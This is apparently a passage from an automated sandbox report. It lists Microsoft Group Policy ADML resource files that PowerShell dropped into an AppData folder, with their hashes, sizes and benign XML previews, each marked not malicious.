                                                                                          MD5:8015A772382BE975C6E6145B1A25F71A
                                                                                          SHA1:4B8773056C6F34C2BF2463E2FC9C346BA73BB221
                                                                                          SHA-256:33A81CBC22929DB64640E0DA5046F30634F5B9DC9271F9601CA7ABCBC0E656D7
                                                                                          SHA-512:61C05CEEC442EB66BFFC11ED4D303D15A15E5D385B62D7118EC3354FB07CDE6EB95A6A98D3828BB213122C98606333B7A7EF72B4719B79D3B07175D50FF3DA8D
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Backup</displayName>.. <description>Windows Backup</description>.. <resources>.. <stringTable>.. <string id="AllowOnlySystemBackup">Allow only system backup</string>.. <string id="AllowOnlySystemBackupExplain">This policy setting allows you to manage whether backups of only system volumes is allowed or both OS and data volumes can be backed up.....If you enable this policy setting, machine administrator/backup operator can backup only volumes hosting OS components and no data only volumes can be backed up.If you disable or do not configure this policy setting, backups can include both system or data volumes.</string>.. <string i

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsColorSystem.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1427
                                                                                          Entropy (8bit):4.84683359240417
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61ymLYLQqTKjUW3gHU5Xyp7lvW8/pV0FV:cgeD5x8gm8fKuTcgeiTD0FV
                                                                                          MD5:39EDDC1EBA0C76841D195659381A44B5
                                                                                          SHA1:3ED545728FAE06E6C94B15B443EE3CCBFED6B902
                                                                                          SHA-256:DFF8FE621764236769B2C17AEC64C4A8496DD967CF2D3EB9E2F8103BD503E12C
                                                                                          SHA-512:7A44DF7BF6E10E7985CD401D69C2361C888FF5D8CCE151C50DA871AD5F680A4EE5ED1941958014BD91FD45E0B5E6C84B6BD77467D9B6D1F197A2BA8096D17EA9
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ProhibitChangingInstalledProfileList">Prohibit installing or uninstalling color profiles</string>.. <string id="ProhibitChangingInstalledProfileListExplain">This policy setting affects the ability of users to install or uninstall color profiles.....If you enable this policy setting, users cannot install new color profiles or uninstall previously installed color profiles.....If you disable or do not configure this policy setting, all users can install new color profiles. Standard users can uninstall color profi

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsConnectNow.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (333), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3410
                                                                                          Entropy (8bit):5.029780460475183
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmCEXQ8gCBmXrmlBGx9HuT5nF2Uxt8IoV:EbEXQ8gCBmXrmMuT5F2Uxt8F
                                                                                          MD5:7FDE7C285C5BFBCD2E562DB3F37096EC
                                                                                          SHA1:FE32189EE6438FF319BDD9C79FFFDEEF158BA977
                                                                                          SHA-256:1471ACA2B4BCD0A4D5BF43330741CC0314A243DE0757DB0383452A7C473E1644
                                                                                          SHA-512:9C1C72D90D5F03399C6AB11029EEE9EB13B897723ED636094AE1565F5E55D4BF9F468A4F93E6BC45C5FA1C135DA0351E5EE2C3372A12C558607230ECC65E78B6
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WCN_Category">Windows Connect Now</string>.. <string id="WCN_DisableWcnUi">Prohibit access of the Windows Connect Now wizards</string>.. <string id="WCN_DisableWcnUi_Help">This policy setting prohibits access to Windows Connect Now (WCN) wizards. ....If you enable this policy setting, the wizards are turned off and users have no access to any of the wizard tasks. All the configuration related tasks, including "Set up a wireless router or access point" and "Add a wireless device" are disabled. ....If you d

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsDefender.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (733), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):75437
                                                                                          Entropy (8bit):4.739020696864297
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:UtkTlKxkN82stKz65oqibddrfPaeq6wEqx2xkN8AAS2VHU/2:UWBD82noaTrfPae62xy8AASD2
                                                                                          MD5:F1A80F0C326A0FDE6917DD3AD03C6561
                                                                                          SHA1:C014384966DEF2C68671E9BED95371447D96FA77
                                                                                          SHA-256:03DD8B1E813023915A4F0143749E9CE752F81EDB973D4071CA522A03028CE619
                                                                                          SHA-512:5FC276B7F1A8D8C3AE163910007405CB38108F5728EE9A2FAE74DD134FCDF3972BA4D46905650C252C96A18BFB781564A626621DAD7F9AFF49BC9D6751399A16
                                                                                          Malicious:false
                                                                                          Preview:<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AntiSpyware">Windows Defender</string>.. <string id="Exclusions">Exclusions</string>.. <string id="NetworkRealtimeInspection">Network Inspection System</string>.. <string id="NetworkRealtimeInspection_Exclusions">Network Inspection System Exclusions</string>.. <string id="Quarantine">Quarantine</string>.. <string id="RealtimeProtection">Real-time Protection</string>.. <string id="Remediation">Remediation</string>.. <string id="Reporting">Reporting</string>.. <string id="Scan">Scan</string>.. <string id="SignatureUpdate">Signature Updates</string>..

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsExplorer.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (989), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):57954
                                                                                          Entropy (8bit):4.692320082638433
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:hctuJMsDha+k7JlgKVrag8E09FlZ9mzQNkQZZZaQZQP2BQvYIsyYiq:hpg8TluE5BQv5syYiq
                                                                                          MD5:C1FBABFE3BC28D72CEB06DABDD8DCDDA
                                                                                          SHA1:74660612AAE1056EBDB1DCBBE4D93AA163558AB4
                                                                                          SHA-256:D350F2161317CCA32AD7BB4D6CF369F3AA81467122855F9FA8B8B0BA15F14893
                                                                                          SHA-512:EC3B8C1449B89C5981CEC9D3F2072AD66D2C92FAC2336365C341959FF9AB60B60083C39D1413217B4F07FFEE3389B4C6DCFFF5B7A7F38EE781A934212F5A1A66
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ABCDOnly">Restrict A, B, C and D drives only</string>.. <string id="ABConly">Restrict A, B and C drives only</string>.. <string id="ABOnly">Restrict A and B drives only</string>.. <string id="ALLDrives">Restrict all drives</string>.. <string id="ClassicShell">Turn on Classic Shell</string>.. <string id="ClassicShell_Help">This setting allows an administrator to revert specific Windows Shell behavior to classic Shell behavior.....If you enable this setting, users cannot configure their syste

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsFileProtection.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4257
                                                                                          Entropy (8bit):4.850396400130338
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pm1WXTuo/WBDr5RCutnwFBTb8WEMa3GUiKV:EQVJtwV3Zahi+
                                                                                          MD5:2652912F37E3671937BB50F97C05FADF
                                                                                          SHA1:F1B96B528263077B0DD66B9C004E923EAA71C6E8
                                                                                          SHA-256:D7293FB074E7098858E2090DB60C7E3A8DC96FA062FACBABDA34AF48C57A4A8A
                                                                                          SHA-512:F462F5F732207EFB517FAB537A556A80BD8BFE80302EBAF9436E34B3788ADF2907F53D08AF871D57EDD03D2C457ECC709320F7DC7F0D33F68F4E2254C111A9AF
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WFP">Windows File Protection</string>.. <string id="WFPDllCacheDir">Specify Windows File Protection cache location</string>.. <string id="WFPDllCacheDir_Help">This policy setting specifies an alternate location for the Windows File Protection cache.....If you enable this policy setting, enter the fully qualified local path to the new location in the "Cache file path" box.....If you disable this setting or do not configure it, the Windows File Protection cache is located in the %Systemroot%\System32\Dllcac

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsFirewall.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (1085), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):43147
                                                                                          Entropy (8bit):4.809526069081037
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:1OHZuj3f3oPzINNKREqPRLHN83hOzwPvW+0NQkAV2ld0lrlBjSMDt3sKaT7c7cA:Z3jNNsohbvW+0NQkAV2ld0lrlB7
                                                                                          MD5:0DDDC70E928C3191D6DB487772FCDDD6
                                                                                          SHA1:124DCC7A766E35E7B8BD9C3EF6C5E62A447F6282
                                                                                          SHA-256:5625F229BC2CE0518F0689C32B02F208D1B160274D5C9AC00707A15FD4F254AB
                                                                                          SHA-512:BF17199483BB0DA38AEA1B64BC98CDED7F000B264BC45444423AC60D710E5855445BEB097523D28FB305E82824B75A4C76F99BA4488D9FA22754853A0BBDC073
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WF_AllowedPrograms_Help">Allows you to view and change the program exceptions list defined by Group Policy. Windows Firewall uses two program exception lists: one is defined by Group Policy settings and the other is defined by the Windows Firewall component in Control Panel.....If you enable this policy setting, you can view and change the program exceptions list defined by Group Policy. If you add a program to this list and set its status to Enabled, that program can receive unsolicited incoming messages on any po

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsMail.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1162
                                                                                          Entropy (8bit):4.9740818694409095
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61ynrrl8q+O0jSBC7knRupMRud+FV:cgeD5x8gm8fKs2q2SA7aoMzFV
                                                                                          MD5:2CDED79A2DD5C6D41BFAA7567008F5CD
                                                                                          SHA1:EC6C5B95AF0DC5559BD8013B3150600AFDCEEEBF
                                                                                          SHA-256:9C7A2043D9D255F11092CE1303ABFD599BBEFC4459D1C87308D4738E2E7225A2
                                                                                          SHA-512:C78FC573B695F8C1AE28056E1A19D80EBCB840D8FC7576353E50951043BC4E2F2E020DB9AE1BF2B81F53DF936E34C40BD1B84322F117B898E01B128D01BE1A33
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TurnOffCommunities">Turn off the communities features</string>.. <string id="TurnOffCommunities_help">Windows Mail will not check your newsgroup servers for Communities support.</string>.. <string id="TurnOffWindowsMail">Turn off Windows Mail application</string>.. <string id="WindowsMail">Windows Mail</string>.. <string id="WindowsMail_help">Denies or allows access to the Windows Mail application.....If you enable this setting, access to the Windows Mail application is denied.....If you disable

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsMediaDRM.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (432), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1636
                                                                                          Entropy (8bit):4.844281894305683
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKmlUrPmP6TuZY4UG4c2SDlSFV:LeD5pm6lY1TuCG4IDUFV
                                                                                          MD5:0BEF85C5A51F0980D97B8F87CC124C6B
                                                                                          SHA1:72C086550C97C4E87B55D7171AA36E1EA33F1371
                                                                                          SHA-256:EEFF3058ED45FA9E18846EE53BE4EF621B20BA2D7BB4535A81CDBF8066604E68
                                                                                          SHA-512:CDD4647BC6B6CE9A3F1ED741C0929C1C768F0E4AF1B2DE27D7C161153CA744117FC34CFEF91C5DC72EDB8AE7FAD91C95F5125E90F2F02ACC27796A37B6E9B190
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableOnline">Prevent Windows Media DRM Internet Access</string>.. <string id="DisableOnlineExplain">Prevents Windows Media Digital Rights Management (DRM) from accessing the Internet (or intranet).....When enabled, Windows Media DRM is prevented from accessing the Internet (or intranet) for license acquisition and security upgrades.....When this policy is enabled, programs are not able to acquire licenses for secure content, upgrade Windows Media DRM security components, or restore backed up content licenses

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsMediaPlayer.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (560), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):22067
                                                                                          Entropy (8bit):4.725628900708413
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:mndYKgb1n1M2UKzDSLikfF6vkRssT0vdtUL607p7aH:cbu3kQDGfFRsY0vQB7pc
                                                                                          MD5:2E98C6915989DDC7243EFCC53275A5FC
                                                                                          SHA1:D83FCE256850CA49F4F58F3D6DE0EFA6F1524B03
                                                                                          SHA-256:AC668C6094254BED8D12F1BF3B6D8E60B552C288ACF47FAB101AB889BA9D824E
                                                                                          SHA-512:D03A54A7ECB7186CDAE5EE39795F9B688C3E193847D0ED0F15CDF3EFC70077DDF2E572A2A5996641A000C4BECCF6C3E090A21FDEFB2D38B996EFF1D9F4771458
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Autodetect">Autodetect</string>.. <string id="ConfigureHTTPProxySettings">Configure HTTP Proxy</string>.. <string id="ConfigureHTTPProxySettingsExplain">This policy setting allows you to specify the HTTP proxy settings for Windows Media Player.....If you enable this policy setting, select one of the following proxy types:....- Autodetect: the proxy settings are automatically detected...- Custom: unique proxy settings are used...- Use browser proxy settings: browser's proxy settings are used.....If the Cus

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsMessenger.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2609
                                                                                          Entropy (8bit):4.83243600779635
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:cgeD5x8gm8fKurmiSL30cT3cCtwpYS3tyLmHI+P25YS3t3zdFV:LeD5pmD7TMSy2FV
                                                                                          MD5:3B589ADE17CCE578D294FF56D65F5321
                                                                                          SHA1:3885D1E98889369FCDF0570B76601B0EEAAEED09
                                                                                          SHA-256:BA36F02C4F20E6A6075C3091D0FD5BC81F6589552889FE4055C4BD90831A7699
                                                                                          SHA-512:4BA6FE1BFB1209B03EA09ADDC64C288D9F076CD72EF968517E12A60AB8EC2060EF877D268ADA856D1B5BD4AA55CAE784D95F033FA839B66A84A039F8F0EFA206
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WinMSG_NoAutoStartWindowsMsg_Comp">Do not automatically start Windows Messenger initially</string>.. <string id="WinMSG_NoAutoStartWindowsMsg_Help">This policy setting prevents Windows Messenger from automatically running at logon. ....If you enable this policy setting, Windows Messenger is not loaded automatically when a user logs on.....If you disable or do not configure this policy setting, Windows Messenger will be loaded automatically at logon.....Note: This policy setting simply prevents Windows Messenge

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsProducts.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5639
                                                                                          Entropy (8bit):4.939572011046928
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5a2Uy2oPZVH9GQPVtmkPl7Q6sP9dBIP0KP6bLPbxTPJiPG5CP5ubPbDyG7kWq:ENPnOXiVyZcNmTDxun
                                                                                          MD5:14C496DDE1D1ACC8B3809CF194122870
                                                                                          SHA1:4A500C7707FD2791A0118C078D5113B0EF4A2844
                                                                                          SHA-256:C662D7E4BF2848728B8F335734CB6500C40E88727F1ABFABCD1E097B4C6B4FB3
                                                                                          SHA-512:5FF521B1B1A903132003B2F20BE3502BA69388D8A9839EB4B8485B56EFB71751B0B69AFC0AF56B0601910A685CE4025F43930A1C24FCD8DDB585A8E17AD35760
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Windows Vista products table</displayName>.. <description>This file contains all the product definitions used in supported on definitions.</description>.... <resources>.. <stringTable>.. Microsoft Windows -->.. <string id="MicrosoftWindows">Windows operating system</string>.. <string id="MicrosoftWindows2000">Windows 2000 operating systems</string>.. <string id="MicrosoftWindows2000_RTM">Windows 2000</string>.. <string id="MicrosoftWindows2000_SP1">Windows 2000 Service Pack 1</string>.. <string id="MicrosoftWindows2000_SP2">Windows 2000 Service Pack 2</string>.. <string id="MicrosoftWindows2000_SP3">Windows 2000

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsRemoteManagement.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (354), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):14554
                                                                                          Entropy (8bit):4.769003944604622
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:EGUQ3V7eAfrBxq5L/cPcFS5YCZXGSqHL/LmLlUCEXjNi2+J1+sEG:9tBc5LUPcKYCZXGSqHDLmBcNi2S
                                                                                          MD5:E24B954C1451F81FC8559A0F42D8B804
                                                                                          SHA1:02CDBB99F2546ED8DD467B9799FDA9DECFE1F716
                                                                                          SHA-256:A8B80A925FCC599E485029B1833C58865A6A16D872FB8766F9ACB8A1E0752D93
                                                                                          SHA-512:156521221250B6029798C10A2BF138954280AEE73D34FEFCC6D6B3ABB9399824B9135D76A2F8FF1F975F1818D123E6D56DCAD7655E6D6EC5851E7D661926A802
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowAutoConfig">Allow remote server management through WinRM</string>.. <string id="AllowBasic">Allow Basic authentication</string>.. <string id="AllowBasicClientHelp">This policy setting allows you to manage whether the Windows Remote Management (WinRM) client uses Basic authentication.....If you enable this policy setting, the WinRM client uses Basic authentication. If WinRM is configured to use HTTP transport, the user name and password are sent over the network as clear text.....If you disable or do

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsRemoteShell.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5497
                                                                                          Entropy (8bit):4.839558778753586
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmCfYYOpQgxeUMP5pWuPG47CngUmOuWg9m56V:EBfY/MPCCG4OngUq0o
                                                                                          MD5:157A758A1233F9764CDFFCB79F8ADAB2
                                                                                          SHA1:F1203844E770993418DCB257146C5BF98532F5C0
                                                                                          SHA-256:35C10ECD562212B9C242ABCEA3EECD82965F173B8F8F2A848F1DD94F725EF0A1
                                                                                          SHA-512:8E70D00D0FEA7F5164EC8BA0FF8B7F548A76A830DA19094827590D46399C4A1F5E21AA2054B5637F1C91095957DE1610C28BCC3974ED3FB36BE3ED6F2D067D45
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowRemoteShellAccess">Allow Remote Shell Access</string>.. <string id="AllowRemoteShellAccess_Help">This policy setting configures access to remote shells.....If you enable this policy setting and set it to False, new remote shell connections are rejected by the server.....If you disable or do not configure this policy setting, new remote shell connections are allowed.</string>.. <string id="IdleTimeout">Specify idle Timeout</string>.. <string id="IdleTimeout_Help">This policy setting configures th

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsServer.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1011
                                                                                          Entropy (8bit):5.086298346478668
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8x4+cCk2q1qOyENX/itRgv8FFV:cgeD5x8lcT/XNUFFV
                                                                                          MD5:14AEA48E9379243660E8B568A71EF533
                                                                                          SHA1:1EACA2C4A36AB2762757FA7CAA1D4256910ECC95
                                                                                          SHA-256:A96786FAA32516C2738C2EC94E676F3D339732AB39318D7CDFFA478A2BAE1231
                                                                                          SHA-512:24AF5CA8EB9650B61FF0A01467A36DD3F55C90741A4FD04C067420A3E150B57F50ADD536513B4D3F0E7A1EC37138205850FFAAED51A1525E1F063C737EFB50E7
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Windows Server 2008 base categories and supported component definitions</displayName>.. <description>This file contains all the base categories and supported component definitions used by server components.</description>.... <resources>.. <stringTable>.. <string id="SUPPORTED_WindowsServer2008">At least Windows Server 2008</string>.. <string id="SUPPORTED_WindowsServer2003R2">At least Windows Server 2003 R2</string>.. <string id="ServerComponents">Server Components</string>.. <string id="ServerComponents_Help">Contains settings for server operating system components.</string>.. </stringTable>.. </resources>..</policyDefinitionR

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\WindowsUpdate.adml

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (561), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):34731
                                                                                          Entropy (8bit):4.71530009460394
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:xtl2CSosXR2nMZIvHWRzwjxqDx6rUtuLTaUL4wl2bux0AcY5Bnn6aaF8MSaUVNKl:xtlwhQMZI/W5w8t6rjxXcYXnhaa3Tu
                                                                                          MD5:1B4DF1C94FAE81C341ABEA40C9ADAD9C
                                                                                          SHA1:7DBDE04EFAF2D6B703417CC6FB0B146D6FD4214F
                                                                                          SHA-256:2AEC8DCD9608B57D3D65321B399FAA530552027F0E3CA814F477816DF803E201
                                                                                          SHA-512:4CFCE39BA34EE283EEC89900AFCA583AE9C0AE86CAA3EE8EC90891347825AF81DD82BD08960551852C6B7C8FD77B5ECDE9BA75C16A3986B7663CB494E3C6E30A
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->.. .. Note that white space is preserved as is in the text shown in the Group Policy UI... Don't add extra line breaks at the beginning and end of text strings,.. and make sure that lines of text start in the FIRST column... -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WU_SUPPORTED_Windows7ToXPSP2">Windows 7, Windows Server 2008 R2, Windows Vista, Windows XP SP2</string>.. <string id="WU_SUPPORTED_Windows7_To_Win2kSP3_Or_XPSP1">Windows 7, Windows Server 2008 R2, Windows Vista, Windows Server 2003, Windows XP SP2, Windows XP SP1 , Windows 2000

                                                                                          C:\Users\user\AppData\Roaming\VWPGdipf\Data\en-US\Winsrv.adml

                                                                                          Download File
